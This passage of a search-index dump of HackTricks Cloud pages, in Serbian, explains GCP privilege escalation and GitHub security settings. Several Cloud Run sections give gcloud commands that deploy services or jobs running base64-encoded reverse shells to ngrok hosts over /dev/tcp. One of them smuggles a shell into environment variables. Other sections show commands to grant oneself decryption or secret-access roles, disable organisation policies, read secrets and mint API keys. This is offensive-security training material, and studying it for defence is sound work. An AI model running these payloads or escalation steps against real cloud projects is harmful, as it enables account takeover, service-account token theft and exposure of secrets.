iam.serviceAccounts.actAs","id":"1018","title":"iam.serviceAccounts.actAs"},"1019":{"body":"Napadač sa pomenutim dozvolama će moći da generiše OpenID JWT. Ovi se koriste za potvrdu identiteta i ne nose nužno nikakvu implicitnu autorizaciju prema resursu. Prema ovom zanimljivom postu , potrebno je naznačiti publiku (uslugu za koju želite da koristite token za autentifikaciju) i dobićete JWT potpisan od strane google-a koji ukazuje na servisni nalog i publiku JWT-a. Možete generisati OpenIDToken (ako imate pristup) sa: bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA\ngcloud auth activate-service-account --key-file=/path/to/svc_account.json\n# Then, generate token\ngcloud auth print-identity-token \"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" --audiences=https://example.com Zatim to možete jednostavno koristiti za pristup usluzi sa: bash curl -v -H \"Authorization: Bearer id_token\" https://some-cloud-run-uc.a.run.app Neke usluge koje podržavaju autentifikaciju putem ovakvih tokena su: Google Cloud Run Google Cloud Functions Google Identity Aware Proxy Google Cloud Endpoints (ako koristite Google OIDC) Možete pronaći primer kako da kreirate OpenID token u ime servisnog naloga ovde .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getOpenIdToken","id":"1019","title":"iam.serviceAccounts.getOpenIdToken"},"102":{"body":"Github omogućava kreiranje okruženja gde možete sačuvati tajne . Zatim, možete dati github akciji pristup tajnama unutar okruženja sa nečim poput: yaml jobs:\ndeployment:\nruns-on: ubuntu-latest\nenvironment: env_name Možete konfigurisati okruženje da bude pristupačno svim granama (podrazumevano), samo za zaštićene grane ili odrediti koje grane mogu da mu pristupe. Takođe može postaviti broj potrebnih recenzija pre izvršavanja akcije koristeći okruženje ili čekati neko vreme pre nego što dozvoli da se implementacije nastave.","breadcrumbs":"Github Security » Basic Github Information » Git Okruženja","id":"102","title":"Git Okruženja"},"1020":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » Reference","id":"1020","title":"Reference"},"1021":{"body":"Reading time: 3 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » GCP - KMS Privesc","id":"1021","title":"GCP - KMS Privesc"},"1022":{"body":"Informacije o KMS: GCP - KMS Enum Napomena da u KMS dozvole nisu samo nasleđene iz Organizacija, Foldera i Projekata, već i iz Keyrings .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » KMS","id":"1022","title":"KMS"},"1023":{"body":"Možete koristiti ovu dozvolu da dekriptuјete informacije sa ključem nad kojim imate ovu dozvolu. bash gcloud kms decrypt \\\n--location=[LOCATION] \\\n--keyring=[KEYRING_NAME] \\\n--key=[KEY_NAME] \\\n--version=[KEY_VERSION] \\\n--ciphertext-file=[ENCRYPTED_FILE_PATH] \\\n--plaintext-file=[DECRYPTED_FILE_PATH]","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecrypt","id":"1023","title":"cloudkms.cryptoKeyVersions.useToDecrypt"},"1024":{"body":"Napadač sa ovom dozvolom mogao bi da sebi dodeli dozvole da koristi ključ za dešifrovanje informacija. bash gcloud kms keys add-iam-policy-binding [KEY_NAME] \\\n--location [LOCATION] \\\n--keyring [KEYRING_NAME] \\\n--member [MEMBER] \\\n--role roles/cloudkms.cryptoKeyDecrypter","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeys.setIamPolicy","id":"1024","title":"cloudkms.cryptoKeys.setIamPolicy"},"1025":{"body":"Evo konceptualnog pregleda kako ova delegacija funkcioniše: Service Account A ima direktan pristup za dekripciju koristeći određeni ključ u KMS-u. Service Account B dobija dozvolu useToDecryptViaDelegation. Ovo mu omogućava da zatraži KMS da dekriptuje podatke u ime Service Account A. Korišćenje ove dozvole je implicitno u načinu na koji KMS servis proverava dozvole kada se podnese zahtev za dekripciju. Kada podnesete standardni zahtev za dekripciju koristeći Google Cloud KMS API (u Pythonu ili drugom jeziku), servis proverava da li traženi servisni nalog ima potrebne dozvole . Ako zahtev podnosi servisni nalog sa useToDecryptViaDelegation dozvolom, KMS proverava da li je ovaj nalog ovlašćen da zatraži dekripciju u ime entiteta koji poseduje ključ . Podešavanje za Delegaciju Definišite Prilagođenu Ulogu : Kreirajte YAML datoteku (npr. custom_role.yaml) koja definiše prilagođenu ulogu. Ova datoteka treba da uključuje cloudkms.cryptoKeyVersions.useToDecryptViaDelegation dozvolu. Evo primera kako bi ova datoteka mogla izgledati: yaml title: \"KMS Decryption via Delegation\"\ndescription: \"Allows decryption via delegation\"\nstage: \"GA\"\nincludedPermissions:\n- \"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation\" Kreirajte Prilagođenu Ulogu Koristeći gcloud CLI : Koristite sledeću komandu da kreirate prilagođenu ulogu u vašem Google Cloud projektu: bash gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml Zamenite [YOUR_PROJECT_ID] sa vašim Google Cloud ID-jem projekta. Dodelite prilagođenu ulogu servisnom nalogu : Dodelite svoju prilagođenu ulogu servisnom nalogu koji će koristiti ovu dozvolu. Koristite sledeću komandu: bash # Give this permission to the service account to impersonate\ngcloud projects add-iam-policy-binding [PROJECT_ID] \\\n--member \"serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]\" \\\n--role \"projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]\" # Give this permission over the project to be able to impersonate any SA\ngcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \\\n--member=\"serviceAccount:[SERVICE_ACCOUNT_EMAIL]\" \\\n--role=\"projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation\" Zamenite [YOUR_PROJECT_ID] i [SERVICE_ACCOUNT_EMAIL] sa vašim ID-jem projekta i email adresom servisnog naloga, respektivno. tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecryptViaDelegation","id":"1025","title":"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"},"1026":{"body":"Reading time: 2 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » GCP - Orgpolicy Privesc","id":"1026","title":"GCP - Orgpolicy Privesc"},"1027":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy","id":"1027","title":"orgpolicy"},"1028":{"body":"Napadač koji koristi orgpolicy.policy.set može manipulisati organizacionim politikama, što će mu omogućiti da ukloni određena ograničenja koja ometaju specifične operacije. Na primer, ograničenje appengine.disableCodeDownload obično blokira preuzimanje izvornog koda App Engine-a. Međutim, korišćenjem orgpolicy.policy.set , napadač može deaktivirati ovo ograničenje, čime dobija pristup za preuzimanje izvornog koda, uprkos tome što je prvobitno bio zaštićen. bash # Get info\ngcloud resource-manager org-policies describe [--folder | --organization | --project ] # Disable\ngcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] Python skripta za ovu metodu može se naći ovde .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy.policy.set","id":"1028","title":"orgpolicy.policy.set"},"1029":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » Reference","id":"1029","title":"Reference"},"103":{"body":"Github akcija može biti izvršena unutar github okruženja ili može biti izvršena u infrastrukturi treće strane koju je konfigurisao korisnik. Nekoliko organizacija će dozvoliti pokretanje Github akcija u infrastrukturi treće strane jer obično bude jeftinije . Možete navesti self-hosted trkače organizacije na https://github.com/organizations//settings/actions/runners Način da saznate koje Github akcije se izvršavaju u ne-github infrastrukturi je da potražite runs-on: self-hosted u yaml konfiguraciji Github akcije. Nije moguće pokrenuti Github akciju organizacije unutar self-hosted okruženja druge organizacije jer se generiše jedinstveni token za trkača prilikom njegove konfiguracije kako bi se znalo kojoj organizaciji trkač pripada. Ako je prilagođeni Github trkač konfiguran na mašini unutar AWS-a ili GCP-a , akcija može imati pristup metapodacima i ukrasti token servisnog naloga sa kojim mašina radi.","breadcrumbs":"Github Security » Basic Github Information » Git Action Runner","id":"103","title":"Git Action Runner"},"1030":{"body":"Reading time: 1 minute tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » GCP - Pubsub Privesc","id":"1030","title":"GCP - Pubsub Privesc"},"1031":{"body":"Dobijte više informacija u: GCP - Pub/Sub Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » PubSub","id":"1031","title":"PubSub"},"1032":{"body":"Snapšotovi tema sadrže trenutne neACKovane poruke i svaku poruku nakon njih . Možete kreirati snapšot teme da pristupite svim porukama , izbegavajući direktan pristup temi .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.create","id":"1032","title":"pubsub.snapshots.create"},"1033":{"body":"Dodelite prethodne dozvole sebi.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.setIamPolicy","id":"1033","title":"pubsub.snapshots.setIamPolicy"},"1034":{"body":"Možete kreirati push pretplatu u temi koja će slati sve primljene poruke na navedeni URL.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.create","id":"1034","title":"pubsub.subscriptions.create"},"1035":{"body":"Postavite svoj URL kao push krajnju tačku da biste ukrali poruke.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.update","id":"1035","title":"pubsub.subscriptions.update"},"1036":{"body":"Pristupite porukama koristeći pretplatu.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.consume","id":"1036","title":"pubsub.subscriptions.consume"},"1037":{"body":"Dajte sebi bilo koju od prethodnih dozvola. tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.setIamPolicy","id":"1037","title":"pubsub.subscriptions.setIamPolicy"},"1038":{"body":"Reading time: 1 minute tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » GCP - Resourcemanager Privesc","id":"1038","title":"GCP - Resourcemanager Privesc"},"1039":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager","id":"1039","title":"resourcemanager"},"104":{"body":"Ako su sve akcije (ili zla akcija) dozvoljene, korisnik bi mogao koristiti Github akciju koja je zla i koja će kompromitovati kontejner u kojem se izvršava. caution Zla Github akcija može biti zloupotrebljena od strane napadača da: Ukrade sve tajne kojima akcija ima pristup Pomera se lateralno ako se akcija izvršava unutar infrastrukture treće strane gde se može pristupiti SA tokenu koji se koristi za pokretanje mašine (verovatno putem usluge metapodataka) Zloupotrebi token koji koristi workflow da ukrade kod repozitorijuma gde se akcija izvršava ili čak da ga izmeni .","breadcrumbs":"Github Security » Basic Github Information » Git Action Compromise","id":"104","title":"Git Action Compromise"},"1040":{"body":"Kao u eksploataciji iam.serviceAccounts.setIamPolicy, ova dozvola vam omogućava da modifikujete svoje dozvole za bilo koji resurs na nivo organizacije . Dakle, možete pratiti isti primer eksploatacije.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.organizations.setIamPolicy","id":"1040","title":"resourcemanager.organizations.setIamPolicy"},"1041":{"body":"Kao u eksploataciji iam.serviceAccounts.setIamPolicy, ova dozvola vam omogućava da modifikujete svoje dozvole za bilo koji resurs na nivo foldera . Dakle, možete pratiti isti primer eksploatacije.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.folders.setIamPolicy","id":"1041","title":"resourcemanager.folders.setIamPolicy"},"1042":{"body":"Kao u eksploataciji iam.serviceAccounts.setIamPolicy, ova dozvola vam omogućava da modifikujete svoje dozvole za bilo koji resurs na nivo projekta . Dakle, možete pratiti isti primer eksploatacije. tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.projects.setIamPolicy","id":"1042","title":"resourcemanager.projects.setIamPolicy"},"1043":{"body":"Reading time: 3 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » GCP - Run Privesc","id":"1043","title":"GCP - Run Privesc"},"1044":{"body":"Za više informacija o Cloud Run proverite: GCP - Cloud Run Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Cloud Run","id":"1044","title":"Cloud Run"},"1045":{"body":"Napadač sa ovim dozvolama može da kreira run servis koji pokreće proizvoljan kod (proizvoljan Docker kontejner), da mu pridruži Service Account i da učini da kod izvadi token Service Account-a iz metapodataka . Eksploatacioni skript za ovu metodu može se naći ovde a Docker slika može se naći ovde . Napomena: kada koristite gcloud run deploy umesto samo kreiranja servisa potrebna je dozvola update . Proverite primer ovde .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.create , iam.serviceAccounts.actAs, run.routes.invoke","id":"1045","title":"run.services.create , iam.serviceAccounts.actAs, run.routes.invoke"},"1046":{"body":"Kao prethodni, ali ažurira servis: bash # Launch some web server to listen in port 80 so the service works\necho \"python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1\" | base64\n# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== gcloud run deploy hacked \\\n--image=ubuntu:22.04 \\ # Make sure to use an ubuntu version that includes python3\n--command=bash \\\n--args=\"-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash\" \\\n--service-account=\"-compute@developer.gserviceaccount.com\" \\\n--region=us-central1 \\\n--allow-unauthenticated # If you don't have permissions to use \"--allow-unauthenticated\", dont use it","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.update , iam.serviceAccounts.actAs","id":"1046","title":"run.services.update , iam.serviceAccounts.actAs"},"1047":{"body":"Dajte sebi prethodne dozvole za cloud Run.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.setIamPolicy","id":"1047","title":"run.services.setIamPolicy"},"1048":{"body":"Pokrenite posao sa reverznim shell-om da biste ukrali servisni nalog naznačen u komandi. Možete pronaći eksploit ovde . bash gcloud beta run jobs create jab-cloudrun-3326 \\\n--image=ubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash\" \\\n--service-account=\"@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--region=us-central1","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)","id":"1048","title":"run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)"},"1049":{"body":"Slično prethodnom, moguće je ažurirati posao i ažurirati SA , komandu i izvršiti je : bash gcloud beta run jobs update hacked \\\n--image=mubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash\" \\\n--service-account=-compute@developer.gserviceaccount.com \\\n--region=us-central1 \\\n--execute-now","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)","id":"1049","title":"run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)"},"105":{"body":"Zaštite grana su dizajnirane da ne daju potpunu kontrolu nad repozitorijumom korisnicima. Cilj je postaviti nekoliko metoda zaštite pre nego što se može pisati kod unutar neke grane . Zaštite grana repozitorijuma mogu se pronaći na https://github.com///settings/branches note Nije moguće postaviti zaštitu grane na nivou organizacije . Tako da sve one moraju biti deklarisane na svakom repozitorijumu. Različite zaštite mogu se primeniti na granu (kao na master): Možete zahtevati PR pre spajanja (tako da ne možete direktno spojiti kod preko grane). Ako je ovo odabrano, različite druge zaštite mogu biti na snazi: Zahtevati broj odobrenja . Veoma je uobičajeno zahtevati 1 ili 2 osobe da odobre vaš PR tako da jedan korisnik ne može direktno spojiti kod. Odbaciti odobrenja kada su novi commitovi poslati . Ako ne, korisnik može odobriti legitiman kod, a zatim dodati zli kod i spojiti ga. Zahtevati recenzije od vlasnika koda . Najmanje 1 vlasnik koda repozitorijuma treba da odobri PR (tako da \"slučajni\" korisnici ne mogu da ga odobre) Ograničiti ko može da odbaci recenzije pull zahteva. Možete odrediti ljude ili timove koji mogu da odbace recenzije pull zahteva. Dozvoliti određenim akterima da zaobiđu zahteve pull zahteva . Ovi korisnici će moći da zaobiđu prethodne restrikcije. Zahtevati da status provere prođe pre spajanja. Neke provere moraju proći pre nego što se može spojiti commit (kao što je github akcija koja proverava da li nema tajnih podataka u čistom tekstu). Zahtevati rešenje razgovora pre spajanja . Svi komentari na kod moraju biti rešeni pre nego što se PR može spojiti. Zahtevati potpisane commitove . Commitovi moraju biti potpisani. Zahtevati linearnu istoriju. Sprečava spajanje commitova da budu poslati na odgovarajuće grane. Uključiti administratore . Ako ovo nije postavljeno, administratori mogu zaobići restrikcije. Ograničiti ko može da šalje na odgovarajuće grane . Ograničiti ko može da pošalje PR. note Kao što vidite, čak i ako uspete da dobijete neka akreditivna sredstva korisnika, repozitorijumi mogu biti zaštićeni sprečavajući vas da šaljete kod na master na primer da kompromitujete CI/CD pipeline.","breadcrumbs":"Github Security » Basic Github Information » Branch Protections","id":"105","title":"Branch Protections"},"1050":{"body":"Dajte sebi prethodne dozvole za Cloud Jobs.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.setIamPolicy","id":"1050","title":"run.jobs.setIamPolicy"},"1051":{"body":"Iskoristite env varijable izvršenja posla da izvršite proizvoljan kod i dobijete reverznu ljusku za iskopavanje sadržaja kontejnera (izvorni kod) i pristupite SA unutar metapodataka: bash gcloud beta run jobs execute job-name --region --update-env-vars=\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)","id":"1051","title":"run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)"},"1052":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Reference","id":"1052","title":"Reference"},"1053":{"body":"Reading time: 2 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » GCP - Secretmanager Privesc","id":"1053","title":"GCP - Secretmanager Privesc"},"1054":{"body":"Za više informacija o secretmanager: GCP - Secrets Manager Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager","id":"1054","title":"secretmanager"},"1055":{"body":"Ovo vam daje pristup za čitanje tajni iz menadžera tajni i možda bi to moglo pomoći u eskalaciji privilegija (u zavisnosti od toga koje informacije su pohranjene unutar tajne): bash # Get clear-text of version 1 of secret: \"\"\ngcloud secrets versions access 1 --secret=\"\" Kao što je ovo takođe tehnika post eksploatacije, može se naći u: GCP - Secretmanager Post Exploitation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.versions.access","id":"1055","title":"secretmanager.versions.access"},"1056":{"body":"Ovo vam omogućava pristup za čitanje tajni iz menadžera tajni, kao što je korišćenje: bash gcloud secrets add-iam-policy-binding \\\n--member=\"serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--role=\"roles/secretmanager.secretAccessor\" tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.secrets.setIamPolicy","id":"1056","title":"secretmanager.secrets.setIamPolicy"},"1057":{"body":"Reading time: 2 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » GCP - Serviceusage Privesc","id":"1057","title":"GCP - Serviceusage Privesc"},"1058":{"body":"Sledeće dozvole su korisne za kreiranje i krađu API ključeva, ne zaboravite ovo iz dokumentacije: API ključ je jednostavna enkriptovana niska koja identifikuje aplikaciju bez ikakvog principala . Korisni su za pristup javnim podacima anonimno , i koriste se za povezivanje API zahteva sa vašim projektom za kvote i naplatu . Dakle, sa API ključem možete naterati tu kompaniju da plati za vašu upotrebu API-a, ali nećete moći da eskalirate privilegije. Da biste saznali druge dozvole i načine za generisanje API ključeva, proverite: GCP - Apikeys Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage","id":"1058","title":"serviceusage"},"1059":{"body":"Pronađena je nedokumentovana API koja se može koristiti za kreiranje API ključeva: bash curl -XPOST \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.create","id":"1059","title":"serviceusage.apiKeys.create"},"106":{"body":"https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise https://docs.github.com/en/enterprise-server https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards https://docs.github.com/en/actions/security-guides/encrypted-secrets tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"Github Security » Basic Github Information » References","id":"106","title":"References"},"1060":{"body":"Pronađena je još jedna nedokumentovana API za listanje API ključeva koji su već kreirani (API ključevi se pojavljuju u odgovoru): bash curl \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.list","id":"1060","title":"serviceusage.apiKeys.list"},"1061":{"body":"Sa ovim dozvolama, napadač može omogućiti i koristiti nove usluge u projektu. To bi moglo omogućiti napadaču da omogući uslugu kao što je admin ili cloudidentity da pokuša da pristupi informacijama iz Workspace-a, ili drugim uslugama za pristup zanimljivim podacima.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.services.enable , serviceusage.services.use","id":"1061","title":"serviceusage.services.enable , serviceusage.services.use"},"1062":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ Podržite HackTricks i ostvarite benefite! Da li radite u cybersecurity kompaniji ? Da li želite da vidite vašu kompaniju oglašenu u HackTricks ? ili želite da imate pristup najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF-u ? 